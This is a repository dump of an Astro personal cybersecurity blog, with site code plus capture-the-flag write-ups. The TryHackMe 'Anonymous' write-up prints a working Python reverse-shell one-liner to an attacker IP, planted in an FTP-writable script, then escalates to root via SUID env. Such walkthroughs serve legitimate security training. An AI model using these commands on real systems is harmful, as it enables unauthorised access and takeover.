├── .gitignore ├── .vscode ├── extensions.json └── launch.json ├── README.md ├── astro.config.mjs ├── lighthouse-score.svg ├── package-lock.json ├── package.json ├── pnpm-lock.yaml ├── public ├── favicon.svg ├── logo.svg ├── placeholder.jpg ├── robots.txt └── verveimage.jpg ├── src ├── .env.example ├── assets │ └── gold.jpg ├── components │ ├── BaseHead.astro │ ├── FeaturedPosts.astro │ ├── Footer.astro │ ├── FormattedDate.astro │ ├── Header.astro │ ├── PostCard.astro │ ├── RecentPosts.astro │ ├── Search.tsx │ ├── SearchPosts.astro │ └── Socials.astro ├── config.ts ├── content │ ├── blog │ │ ├── annonforce.md │ │ ├── annonymous.md │ │ ├── anthem.md │ │ ├── artemis.md │ │ ├── attacking-kerberos.md │ │ ├── basic-malware-re.md │ │ ├── basic-xss.md │ │ ├── biohazard.md │ │ ├── blaster.md │ │ ├── blog-thm.md │ │ ├── blueprint.md │ │ ├── boiler-ctf.md │ │ ├── break-out-of-the-cage.md │ │ ├── brute-it.md │ │ ├── chocolate-factory.md │ │ ├── cicada-3301.md │ │ ├── ctf-collection-vol2.md │ │ ├── daily-bugle.md │ │ ├── dav.md │ │ ├── dogcat.md │ │ ├── easy-steganography.md │ │ ├── geolocating-images.md │ │ ├── git-happens.md │ │ ├── ha-jocker-ctf.md │ │ ├── introduction-to-reverse-engineering-part-1.md │ │ ├── introduction-to-reverse-engineering-part-2.md │ │ ├── jack-of-all-trades.md │ │ ├── lazy-admin.md │ │ ├── lian-yu.md │ │ ├── library-ctf.md │ │ ├── madness.md │ │ ├── mr-robot-ctf.md │ │ ├── nax.md │ │ ├── ninja-skills.md │ │ ├── o5YDmWb.png │ │ ├── password-cracking.md │ │ ├── pickle-rick-ctf.md │ │ ├── radare2.md │ │ ├── rp-web-scanning.md │ │ ├── simple-ctf.md │ │ ├── smag-grotto.md │ │ ├── stealthcopter-ctf.md │ │ ├── the-impossible-challenge.md │ │ ├── thompson.md │ │ ├── tomghost.md │ │ ├── ultratech-ctf.md │ │ ├── uopeasy.md │ │ ├── wireshark-ctf.md │ │ ├── wonderlands-ctf.md │ │ └── year-of-the-rabbit.md │ ├── config.ts │ └── images │ │ ├── annonforce │ │ └── hero.jpeg │ │ ├── annonymous │ │ └── hero.png │ │ ├── anthem │ │ └── hero.png │ │ ├── artemis │ │ ├── Untitled01.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled13.png │ │ ├── Untitled14.png │ │ ├── Untitled15.png │ │ ├── Untitled16.png │ │ ├── Untitled17.png │ │ ├── Untitled18.png │ │ ├── Untitled19.png │ │ ├── Untitled2.png │ │ ├── Untitled20.png │ │ ├── Untitled21.png │ │ ├── Untitled22.png │ │ ├── Untitled23.png │ │ ├── Untitled24.png │ │ ├── Untitled25.png │ │ ├── Untitled26.png │ │ ├── Untitled27.png │ │ ├── Untitled28.png │ │ ├── Untitled29.png │ │ ├── Untitled3.png │ │ ├── Untitled30.png │ │ ├── Untitled31.png │ │ ├── Untitled32.png │ │ ├── Untitled33.png │ │ ├── Untitled34.png │ │ ├── Untitled35.png │ │ ├── Untitled36.png │ │ ├── Untitled37.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── attackingkerberos │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── basicmalware │ │ └── hero.jpeg │ │ ├── basicxss │ │ └── hero.jpg │ │ ├── biohazard │ │ └── hero.png │ │ ├── blogthm │ │ └── hero.png │ │ ├── blueprint │ │ └── hero.jpeg │ │ ├── boiler │ │ └── hero.jpeg │ │ ├── breakcage │ │ └── hero.jpeg │ │ ├── bruteit │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── chocolatefactory │ │ └── hero.jpg │ │ ├── cicada │ │ └── hero.jpeg │ │ ├── ctfcollv2 │ │ └── hero.png │ │ ├── dailybugle │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled13.png │ │ ├── Untitled14.png │ │ ├── Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.png │ │ ├── dav │ │ └── hero.jpeg │ │ ├── default.png │ │ ├── dogcat │ │ └── hero.png │ │ ├── ethicalcourse │ │ └── hero.jpeg │ │ ├── ezsteg │ │ └── hero.png │ │ ├── geolocimages │ │ └── hero.jpeg │ │ ├── githappens │ │ └── hero.png │ │ ├── impossiblechallenge │ │ └── hero.png │ │ ├── introduction-to-reverse-engineering-part-1 │ │ ├── Image01.png │ │ ├── Image02.png │ │ ├── Image03.png │ │ ├── Image04.png │ │ ├── Image05.png │ │ ├── Image06.png │ │ ├── Image07.png │ │ ├── Image08.png │ │ ├── Image09.png │ │ ├── Image10.png │ │ ├── Image11.png │ │ ├── Image12.png │ │ ├── Image13.png │ │ ├── Image14.png │ │ ├── Image15.png │ │ ├── Image17.png │ │ ├── Image18.png │ │ ├── Image19.png │ │ ├── Image20.png │ │ ├── Image21.png │ │ ├── Image22.png │ │ └── hero.png │ │ ├── introduction-to-reverse-engineering-part-2 │ │ ├── XREF.png │ │ ├── afl++.png │ │ ├── checksec.png │ │ ├── document-1658231026.png │ │ ├── document-1658231086.png │ │ ├── document-1658231198.png │ │ ├── document-1658232014.png │ │ ├── elf-struct.png │ │ ├── hero.jpeg │ │ ├── httpd.png │ │ └── mips-reverse-shell.png │ │ ├── jacktrades │ │ └── hero.jpeg │ │ ├── jockerctf │ │ └── hero.jpeg │ │ ├── lazy-admin │ │ └── hero.jpeg │ │ ├── lian-yu │ │ └── hero.jpeg │ │ ├── libraryctf │ │ └── hero.jpeg │ │ ├── madness │ │ └── hero.png │ │ ├── mrrobotctf │ │ └── hero.jpg │ │ ├── nax │ │ └── hero.png │ │ ├── ninjaskills │ │ └── hero.png │ │ ├── passwordcrack │ │ └── hero.jpeg │ │ ├── pickle-rick-ctf │ │ └── hero.jpeg │ │ ├── radare2 │ │ └── hero.png │ │ ├── simple-ctf │ │ └── hero.png │ │ ├── smaggrotto │ │ └── hero.jpeg │ │ ├── stealthcopter-ctf │ │ └── hero.jpeg │ │ ├── stegcourse │ │ └── hero.jpeg │ │ ├── thompson │ │ └── hero.jpg │ │ ├── tomghost │ │ └── hero.jpeg │ │ ├── ultratechctf │ │ └── hero.png │ │ ├── uopeasy │ │ └── hero.jpg │ │ ├── webscan │ │ └── hero.png │ │ ├── wiresharkctf │ │ └── hero.jpeg │ │ ├── worderlandsctf │ │ └── hero.jpeg │ │ └── yearrabbit │ │ └── hero.jpeg ├── env.d.ts ├── layouts │ ├── MainLayout.astro │ └── PostLayout.astro ├── pages │ ├── 404.astro │ ├── blog │ │ ├── [...slug].astro │ │ └── index.astro │ ├── index.astro │ └── rss.xml.ts ├── socialicons.ts ├── styles │ └── base.css └── types.ts ├── tailwind.config.mjs └── tsconfig.json /.gitignore: -------------------------------------------------------------------------------- 1 | # build output 2 | dist/ 3 | 4 | # generated types 5 | .astro/ 6 | 7 | # dependencies 8 | node_modules/ 9 | 10 | # logs 11 | npm-debug.log* 12 | yarn-debug.log* 13 | yarn-error.log* 14 | pnpm-debug.log* 15 | 16 | # environment variables 17 | .env 18 | .env.production 19 | 20 | # macOS-specific files 21 | .DS_Store 22 | -------------------------------------------------------------------------------- /.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["astro-build.astro-vscode"], 3 | "unwantedRecommendations": [] 4 | } 5 | -------------------------------------------------------------------------------- /.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "0.2.0", 3 | "configurations": [ 4 | { 5 | "command": "./node_modules/.bin/astro dev", 6 | "name": "Development server", 7 | "request": "launch", 8 | "type": "node-terminal" 9 | } 10 | ] 11 | } 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Personal blog about cyber security and challenges 2 | 3 | 👀 Profile on cybersecurity websites : 4 | 5 | - [TryHackMe](https://tryhackme.com/p/lascc) 6 | - [Root-Me](https://www.root-me.org/zeeph) 7 | - [HTB](https://www.hackthebox.eu/profile/157489) 8 | 9 | ## ✅ Lighthouse Score 10 | 11 |

12 | 13 | Verve Lighthouse Score 14 | 15 |

16 | 17 | ## Develop & Build 18 | 19 | Once installed or cloned locally and all packages are installed you can begin developing your site. 20 | 21 | ```console 22 | # Run localhost 23 | yarn install && yarn dev 24 | 25 | # Build your Gatsby site 26 | yarn clean && yarn build 27 | ``` 28 | 29 | ## Help 30 | 31 | For more information visit the [Theme repository.](https://github.com/aryanjha256/verve) 32 | 33 | ## 🧞 Commands 34 | 35 | All commands are run from the root of the project, from a terminal: 36 | 37 | | Command | Action | 38 | | :------------------------- | :----------------------------------------------- | 39 | | `pnpm install` | Installs dependencies | 40 | | `pnpm run dev` | Starts local dev server at `localhost:4321` | 41 | | `pnpm run build` | Build your production site to `./dist/` | 42 | | `pnpm run preview` | Preview your build locally, before deploying | 43 | | `pnpm run astro ...` | Run CLI commands like `astro add`, `astro check` | 44 | | `pnpm run astro -- --help` | Get help using the Astro CLI | 45 | -------------------------------------------------------------------------------- /astro.config.mjs: -------------------------------------------------------------------------------- 1 | import mdx from "@astrojs/mdx"; 2 | import sitemap from "@astrojs/sitemap"; 3 | import tailwind from "@astrojs/tailwind"; 4 | import { defineConfig } from "astro/config"; 5 | import { SITE_URL } from "./src/config"; 6 | 7 | import react from "@astrojs/react"; 8 | 9 | // https://astro.build/config 10 | export default defineConfig({ 11 | site: SITE_URL, 12 | integrations: [ 13 | tailwind({ 14 | applyBaseStyles: true, 15 | }), 16 | sitemap(), 17 | mdx(), 18 | react(), 19 | ], 20 | markdown: { 21 | shikiConfig: { 22 | theme: "one-dark-pro", 23 | }, 24 | }, 25 | }); 26 | -------------------------------------------------------------------------------- /lighthouse-score.svg: -------------------------------------------------------------------------------- 1 | 2 | 121 | 122 | 123 | 124 | 100 125 | Performance 126 | , 127 | 128 | 129 | 100 130 | Accessibility 131 | , 132 | 133 | 134 | 100 135 | Best Practices 136 | , 137 | 138 | 139 | 100 140 | SEO 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 0-49 155 | 50-89 156 | 90-100 157 | 158 | 159 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "verve", 3 | "type": "module", 4 | "version": "0.0.1", 5 | "scripts": { 6 | "dev": "astro dev", 7 | "start": "astro dev", 8 | "build": "astro check && astro build", 9 | "preview": "astro preview", 10 | "astro": "astro" 11 | }, 12 | "dependencies": { 13 | "@astrojs/check": "^0.5.2", 14 | "@astrojs/mdx": "^2.1.1", 15 | "@astrojs/partytown": "^2.0.4", 16 | "@astrojs/react": "^3.0.10", 17 | "@astrojs/rss": "^4.0.5", 18 | "@astrojs/sitemap": "^3.0.5", 19 | "@astrojs/tailwind": "^5.1.0", 20 | "@fontsource-variable/rubik": "^5.0.20", 21 | "@types/react": "^18.2.55", 22 | "@types/react-dom": "^18.2.19", 23 | "astro": "^4.3.5", 24 | "astro-beam": "^1.1.2", 25 | "fuse.js": "^7.0.0", 26 | "react": "^18.2.0", 27 | "react-dom": "^18.2.0", 28 | "sharp": "^0.33.2", 29 | "tailwindcss": "^3.4.1", 30 | "typescript": "^5.3.3" 31 | }, 32 | "devDependencies": { 33 | "@tailwindcss/typography": "^0.5.10" 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /public/favicon.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /public/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /public/placeholder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/public/placeholder.jpg -------------------------------------------------------------------------------- /public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: / 3 | -------------------------------------------------------------------------------- /public/verveimage.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/public/verveimage.jpg -------------------------------------------------------------------------------- /src/.env.example: -------------------------------------------------------------------------------- 1 | BEAMTOKEN="SAMPLE" -------------------------------------------------------------------------------- /src/assets/gold.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/assets/gold.jpg -------------------------------------------------------------------------------- /src/components/BaseHead.astro: -------------------------------------------------------------------------------- 1 | --- 2 | interface Props { 3 | title: string; 4 | description: string; 5 | image?: string; 6 | } 7 | 8 | const canonicalURL = new URL(Astro.url.pathname, Astro.site); 9 | 10 | const { title, description, image = "/placeholder.jpg" } = Astro.props; 11 | --- 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | {title} 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /src/components/FeaturedPosts.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | 4 | import PostCard from "../components/PostCard.astro"; 5 | 6 | const posts = (await getCollection("blog")).sort( 7 | (a, b) => b.data.pubDate.valueOf() - a.data.pubDate.valueOf() 8 | ); 9 | 10 | const featuredPost = posts 11 | .filter((post) => post.data.featured === true) 12 | .slice(0, 3); 13 | --- 14 | 15 |

Featured Posts

16 | 28 | -------------------------------------------------------------------------------- /src/components/Footer.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SITE_TITLE } from "../config"; 3 | import Socials from "./Socials.astro"; 4 | --- 5 | 6 | 16 | -------------------------------------------------------------------------------- /src/components/FormattedDate.astro: -------------------------------------------------------------------------------- 1 | --- 2 | interface Props { 3 | date: Date; 4 | } 5 | 6 | const { date } = Astro.props; 7 | --- 8 | 9 | 18 | -------------------------------------------------------------------------------- /src/components/Header.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SITE_LOGO, SITE_TITLE } from "../config"; 3 | --- 4 | 5 |
8 | 9 | { 10 | SITE_LOGO ? ( 11 | {SITE_TITLE} 12 | ) : ( 13 | {SITE_TITLE} 14 | ) 15 | } 16 | 17 | 34 |
35 | -------------------------------------------------------------------------------- /src/components/PostCard.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import FormattedDate from "./FormattedDate.astro"; 3 | 4 | interface Props { 5 | title: string; 6 | desc: string; 7 | href: string; 8 | pubDate: Date; 9 | } 10 | 11 | const { href, title, desc, pubDate } = Astro.props; 12 | --- 13 | 14 |
  • 15 | 16 |
    17 |
    18 |
    19 | 20 |
    21 |

    {title}

    22 |
    23 |

    {desc}

    24 |
    25 |     26 |
    • 27 | -------------------------------------------------------------------------------- /src/components/RecentPosts.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | 4 | import PostCard from "../components/PostCard.astro"; 5 | 6 | const posts = (await getCollection("blog")).sort( 7 | (a, b) => b.data.pubDate.valueOf() - a.data.pubDate.valueOf() 8 | ); 9 | 10 | const latestPost = posts.slice(0, 4); 11 | --- 12 | 13 |

    Recent Posts

    14 | 26 | 27 | 48 | 49 | -------------------------------------------------------------------------------- /src/components/Search.tsx: -------------------------------------------------------------------------------- 1 | import Fuse from "fuse.js"; 2 | import { useState } from "react"; 3 | 4 | const Search = (poststosearch: any) => { 5 | const [input, setinput] = useState(""); 6 | 7 | const fuse = new Fuse(poststosearch.poststosearch, { 8 | keys: ["data.title", "data.description"], 9 | }); 10 | 11 | return ( 12 | <> 13 |
    14 | 15 | 21 | 25 | 26 | 27 | 28 | 31 | 32 | { 40 | setinput(e.target.value); 41 | }} 42 | /> 43 |
    44 |
    45 | {fuse.search(input).map((result: any, index: any) => ( 46 | 47 |
    48 | {result.item.data.title} 49 |
    50 |     51 | ))} 52 |
    53 | 54 | ); 55 | }; 56 | 57 | export default Search; 58 | -------------------------------------------------------------------------------- /src/components/SearchPosts.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | import Search from "./Search"; 4 | 5 | const posts = await getCollection("blog"); 6 | --- 7 | 8 | 9 | -------------------------------------------------------------------------------- /src/components/Socials.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SOCIALS } from "../config"; 3 | import socialicons from "../socialicons"; 4 | --- 5 | 6 |
    7 | { 8 | SOCIALS.filter((social) => social.active).map((social) => ( 9 | 14 | 15 | {social.linkTitle} 16 | 17 | )) 18 | } 19 |
    20 | -------------------------------------------------------------------------------- /src/config.ts: -------------------------------------------------------------------------------- 1 | import type { Socials } from "./types"; 2 | 3 | export const SITE_URL = "https://ludovic-coulon.com"; 4 | export const SITE_TITLE = "Ludovic COULON - Cybersecurity blog"; 5 | export const SITE_DESCRIPTION = 6 | "Ludovic COULON - Cybersecurity blog | Blog that brings together various articles on IT security and writeup about challenges I have achieved."; 7 | export const SITE_LOGO = "/logo.svg"; 8 | 9 | export const SOCIALS: Socials = [ 10 | { 11 | name: "Github", 12 | href: "https://github.com/LasCC", 13 | linkTitle: ` ${SITE_TITLE} on Github`, 14 | active: true, 15 | }, 16 | { 17 | name: "LinkedIn", 18 | href: "https://www.linkedin.com/in/ludovic-coulon/", 19 | linkTitle: `${SITE_TITLE} on LinkedIn`, 20 | active: true, 21 | }, 22 | ]; 23 | -------------------------------------------------------------------------------- /src/content/blog/annonymous.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Anonymous - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-19 5 | description: "Writeup for the Anonymous on TryHackMe" 6 | --- 7 | [TryHackMe | Anonymous](https://tryhackme.com/room/anonymous) 8 | 9 | Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. 10 | Acquiring both flags will require some basic knowledge of Linux and 11 | privilege escalation methods. 12 | 13 | For more information on Linux, check out [Learn Linux](https://tryhackme.com/room/zthlinux) 14 | 15 | --- 16 | 17 | ### #1 Enumerate the machine. How many ports are open? 18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.131.140 21 | ``` 22 | 23 | ``` 24 | 21/tcp open ftp vsftpd 2.0.8 or later 25 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 26 | |_sslv2-drown: 27 | 28 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 29 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 30 | 31 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 32 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 33 | 34 | 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 35 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 36 | Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ### #2 What service is running on port 21? 40 | 41 | ``` 42 | 21/tcp open ftp vsftpd 2.0.8 or later 43 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 44 | |_sslv2-drown: 45 | ``` 46 | 47 | ``` 48 | ftp 49 | ``` 50 | 51 | ### #3 What service is running on ports 139 and 445? 52 | 53 | ``` 54 | smb 55 | ``` 56 | 57 | ### #4 There's a share on the user's computer. What's it called? 58 | 59 | ![](https://imgur.com/4X6K5lM.png) 60 | 61 | ![](https://imgur.com/5Aznrzp.png) 62 | 63 | ``` 64 | ➜ TryHackMe smbclient -L 10.10.131.140 65 | Enter WORKGROUP\kali password: 66 | 67 | Sharename Type Comment 68 | --------- ---- ------- 69 | print$ Disk Printer Drivers 70 | pics Disk My SMB Share Directory for Pics 71 | IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu)) 72 | SMB1 disabled -- no workgroup available 73 | ``` 74 | 75 | ``` 76 | pics 77 | ``` 78 | 79 | ### #5 user.txt 80 | 81 | Let's go to the ftp using the anonymous login 82 | 83 | ``` 84 | ➜ TryHackMe ftp 10.10.215.153 85 | Connected to 10.10.215.153. 86 | 220 NamelessOne FTP Server! 87 | Name (10.10.215.153:kali): anonymous 88 | 331 Please specify the password. 89 | Password: no password there 90 | 230 Login successful. 91 | Remote system type is UNIX. 92 | Using binary mode to transfer files. 93 | ftp> ls 94 | 200 PORT command successful. Consider using PASV. 95 | 150 Here comes the directory listing. 96 | drwxrwxrwx 2 111 113 4096 May 17 21:30 scripts 97 | 226 Directory send OK. 98 | ftp> cd scripts 99 | 250 Directory successfully changed. 100 | ftp> ls -la 101 | 200 PORT command successful. Consider using PASV. 102 | 150 Here comes the directory listing. 103 | drwxrwxrwx 2 111 113 4096 May 17 21:30 . 104 | drwxr-xr-x 3 65534 65534 4096 May 13 19:49 .. 105 | -rwxr-xrwx 1 1000 1000 314 May 14 14:52 clean.sh 106 | -rw-rw-r-- 1 1000 1000 86 May 17 22:55 removed_files.log 107 | -rw-r--r-- 1 1000 1000 68 May 12 03:50 to_do.txt 108 | 226 Directory send OK. 109 | ``` 110 | 111 | Let's put a reverse shell in the ftp shall we ? c: 112 | 113 | [Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 114 | 115 | You can use whatever you want I will use the python reverse shell. 116 | 117 | ``` 118 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.2.228",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 119 | ``` 120 | 121 | Rename the payload 'clean.sh' and put it in the ftp 122 | 123 | ``` 124 | ftp> put clean.sh 125 | local: clean.sh remote: clean.sh 126 | 200 PORT command successful. Consider using PASV. 127 | 150 Ok to send data. 128 | 226 Transfer complete. 129 | 226 bytes sent in 0.00 secs (2.3427 MB/s) 130 | ``` 131 | 132 | Now let's wait the ftp server to execute the payload 133 | 134 | ``` 135 | ➜ TryHackMe nc -lnvp 4444 136 | listening on [any] 4444 ... 137 | connect to [10.9.2.228] from (UNKNOWN) [10.10.215.153] 37426 138 | /bin/sh: 0: cant access tty; job control turned off 139 | $ ls 140 | pics 141 | user.txt 142 | $ cat user.txt 143 | 90d6f992585815ff991e68748c414740 144 | ``` 145 | 146 | ### #6 root.txt 147 | 148 | ``` 149 | $ find / -perm -u=s -type f 2>/dev/null 150 | /snap/core/8268/bin/mount 151 | /snap/core/8268/bin/ping 152 | /snap/core/8268/bin/ping6 153 | /snap/core/8268/bin/su 154 | /snap/core/8268/bin/umount 155 | /snap/core/8268/usr/bin/chfn 156 | /snap/core/8268/usr/bin/chsh 157 | /snap/core/8268/usr/bin/gpasswd 158 | /snap/core/8268/usr/bin/newgrp 159 | /snap/core/8268/usr/bin/passwd 160 | /snap/core/8268/usr/bin/sudo 161 | /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper 162 | /snap/core/8268/usr/lib/openssh/ssh-keysign 163 | /snap/core/8268/usr/lib/snapd/snap-confine 164 | /snap/core/8268/usr/sbin/pppd 165 | /snap/core/9066/bin/mount 166 | /snap/core/9066/bin/ping 167 | /snap/core/9066/bin/ping6 168 | /snap/core/9066/bin/su 169 | /snap/core/9066/bin/umount 170 | /snap/core/9066/usr/bin/chfn 171 | /snap/core/9066/usr/bin/chsh 172 | /snap/core/9066/usr/bin/gpasswd 173 | /snap/core/9066/usr/bin/newgrp 174 | /snap/core/9066/usr/bin/passwd 175 | /snap/core/9066/usr/bin/sudo 176 | /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper 177 | /snap/core/9066/usr/lib/openssh/ssh-keysign 178 | /snap/core/9066/usr/lib/snapd/snap-confine 179 | /snap/core/9066/usr/sbin/pppd 180 | /bin/umount 181 | /bin/fusermount 182 | /bin/ping 183 | /bin/mount 184 | /bin/su 185 | /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 186 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 187 | /usr/lib/snapd/snap-confine 188 | /usr/lib/policykit-1/polkit-agent-helper-1 189 | /usr/lib/eject/dmcrypt-get-device 190 | /usr/lib/openssh/ssh-keysign 191 | /usr/bin/passwd 192 | /usr/bin/env 193 | /usr/bin/gpasswd 194 | /usr/bin/newuidmap 195 | /usr/bin/newgrp 196 | /usr/bin/chsh 197 | /usr/bin/newgidmap 198 | /usr/bin/chfn 199 | /usr/bin/sudo 200 | /usr/bin/traceroute6.iputils 201 | /usr/bin/at 202 | /usr/bin/pkexec 203 | $ ./env /bin/sh -p 204 | /bin/sh: 4: ./env: not found 205 | $ /usr/bin/env /bin/sh -p 206 | /usr/bin/env /bin/sh -p 207 | $ id 208 | uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) 209 | ``` 210 | 211 | [All the suid shell on GTFOBins | GTFOBins](https://gtfobins.github.io/#+suid) 212 | 213 | ``` 214 | $ cd /root/ 215 | cd /root/ 216 | $ ls 217 | ls 218 | root.txt 219 | $ cat root.txt 220 | cat root.txt 221 | 4d930091c31a622a7ed10f27999af363 222 | ``` 223 | 224 | 225 | -------------------------------------------------------------------------------- /src/content/blog/basic-malware-re.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Basic Malware RE - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-08-27 5 | description: "This room aims towards helping everyone learn about the basics of Malware Reverse Engineering" 6 | --- 7 | 8 | [TryHackMe | Basic Malware RE](https://tryhackme.com/room/basicmalwarere) 9 | 10 | These challenges are aimed towards learning about the "Static Analysis" technique used to analyze the malware. The main aim for this room is not to used any types of debuggers neither the executable's/programs should be run on any platform. You are required to answer all the questions without even using the debugger and even not executing the executable's/programs. 11 | 12 | Meanwhile all the credits goes to **@MalwareTechBlog** for creating these awesome challenges. 13 | 14 | --- 15 | 16 | # Strings :: Challenge 1 17 | 18 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 19 | 20 | Note: You don't need to run the executable! 21 | 22 | ### **#1 What is the flag of which that MD5 gets generated?** 23 | 24 | Let's start reverse engineering the first flag by launching IDA 25 | 26 | ![](https://i.imgur.com/yttOJFV.png) 27 | 28 | ![](https://i.imgur.com/YGXMw5F.png) 29 | 30 | As you can see the command `mov eax, off_432294` copies the content of the flag of the memory address (`off_432294`) into the EAX register. 31 | 32 | You can see the flag by mouse over the address. 33 | 34 | ![](https://i.imgur.com/oFYdrs5.png) 35 | 36 | ![](https://i.imgur.com/BoXqCXn.png) 37 | 38 | ``` 39 | FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS} 40 | ``` 41 | 42 | # Strings :: Challenge 2 43 | 44 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 45 | 46 | **Note: You don't need to run the executable!** 47 | 48 | --- 49 | 50 | ### **#1 What is the flag of which that MD5 gets generated?** 51 | 52 | Like the first one, let's start the reverse with IDA 53 | 54 | ![](https://i.imgur.com/FNAAo9X.png) 55 | 56 | Well this one is pretty straight forward , you just need to decode the hex values into ascii. 57 | 58 | ![](https://i.imgur.com/heSWxWN.png) 59 | 60 | ``` 61 | FLAG{STACK-STRINGS-ARE-BEST-STRINGS} 62 | ``` 63 | 64 | # Strings 3 :: Challenge 3 65 | 66 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 67 | 68 | Note: You don't need to run the executable! 69 | 70 | --- 71 | 72 | ### **#1 What is the flag of which that MD5 gets generated?** 73 | 74 | For this one use GHIDRA and follow the image bellow 🙄 75 | 76 | ![](https://i.imgur.com/PrAITp0.png) 77 | 78 | ``` 79 | FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE} 80 | ``` 81 | -------------------------------------------------------------------------------- /src/content/blog/basic-xss.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Basic XSS - Google" 3 | category: "XSS" 4 | pubDate: 2020-11-27 5 | description: "This room aims towards helping everyone learn about the basics of xss" 6 | --- 7 | [ XSS-Game Website ](https://xss-game.appspot.com/level1) 8 | 9 | # Level 1: Hello, world of XSS 10 | 11 | ## Mission Description 12 | 13 | This level demonstrates a common cause of cross-site scripting where user input is directly included in the page without proper escaping. 14 | Interact with the vulnerable application window below and find a way to make it execute JavaScript of your choosing. You can take actions inside the vulnerable window or directly edit its URL bar. 15 | 16 | ## Mission Objective 17 | 18 | Inject a script to pop up a JavaScript alert() in the frame below. 19 | Once you show the alert you will be able to advance to the next level. 20 | 21 | ![](https://i.imgur.com/3fn414G.png) 22 | 23 | For the first one, this is 